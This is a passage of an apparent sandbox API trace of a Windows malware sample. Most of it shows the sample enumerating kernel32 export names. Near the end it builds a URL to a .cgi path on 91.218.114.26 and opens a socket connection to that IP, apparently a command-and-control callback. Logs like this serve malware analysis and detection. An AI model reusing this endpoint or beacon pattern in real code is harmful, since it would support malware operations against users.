lpString1=0x31cec6c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.206] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.206] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.206] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.209] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.209] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.209] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.209] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.209] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.209] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.209] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.209] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.209] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.209] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.209] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.209] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.209] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.209] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.209] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.209] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.210] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.210] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.210] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.210] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.210] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.210] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.210] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.210] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.210] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.210] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.210] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.210] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.210] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.210] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.210] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.210] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.210] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.210] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.210] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.211] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.211] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.211] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.211] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.211] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.211] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.211] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.211] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.211] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.211] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.211] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.211] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.211] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.211] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.211] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.211] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.211] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.211] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.211] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.211] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.212] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.212] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.212] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.212] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.212] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.212] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.212] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.212] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.212] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.212] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.212] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.212] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.212] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.212] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.212] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.212] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.212] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.212] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.212] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.212] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.213] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.213] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.213] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.213] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.213] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.213] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.213] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.213] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.213] lstrlenA (lpString="DELETEATOM") returned 10 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.213] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.213] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.213] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.213] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.213] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.213] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.213] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.213] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.213] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.213] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.213] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.214] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.214] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.214] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.214] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.214] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.214] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.214] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.214] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.214] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.214] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.214] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.214] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.214] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.214] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.214] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.214] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.214] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.214] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.214] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.214] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.214] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.215] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.215] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.215] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.215] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.215] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.215] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.215] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.215] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.215] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.215] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.215] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.215] wsprintfA (in: param_1=0x5c0000, param_2="http://%s%s" | out: param_1="http://91.218.114.26/logout/logout/bo.cgi?es=koofqsn6&xwum=4032244h") returned 67 [0179.215] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0179.216] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x620000 [0179.216] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0179.216] VirtualAlloc (lpAddress=0x0, dwSize=0x3d, flAllocationType=0x3000, flProtect=0x4) returned 0x730000 [0179.217] inet_pton (in: Family=2, pszAddrString="91.218.114.26", pAddrBuf=0x31cf30c | out: pAddrBuf=0x31cf30c) returned 1 [0179.217] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x31cf758 | out: lpWSAData=0x31cf758) returned 0 [0179.220] socket (af=2, type=1, protocol=6) returned 0x214 [0179.222] inet_addr (cp="91.218.114.26") returned 0x1a72da5b [0179.222] htons (hostshort=0x50) returned 0x5000 [0179.223] connect (s=0x214, name=0x31cf2e8*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.26"), namelen=16) returned 0 [0179.278] lstrlenA (lpString="kernel32.dll") returned 12 [0179.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.278] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.278] 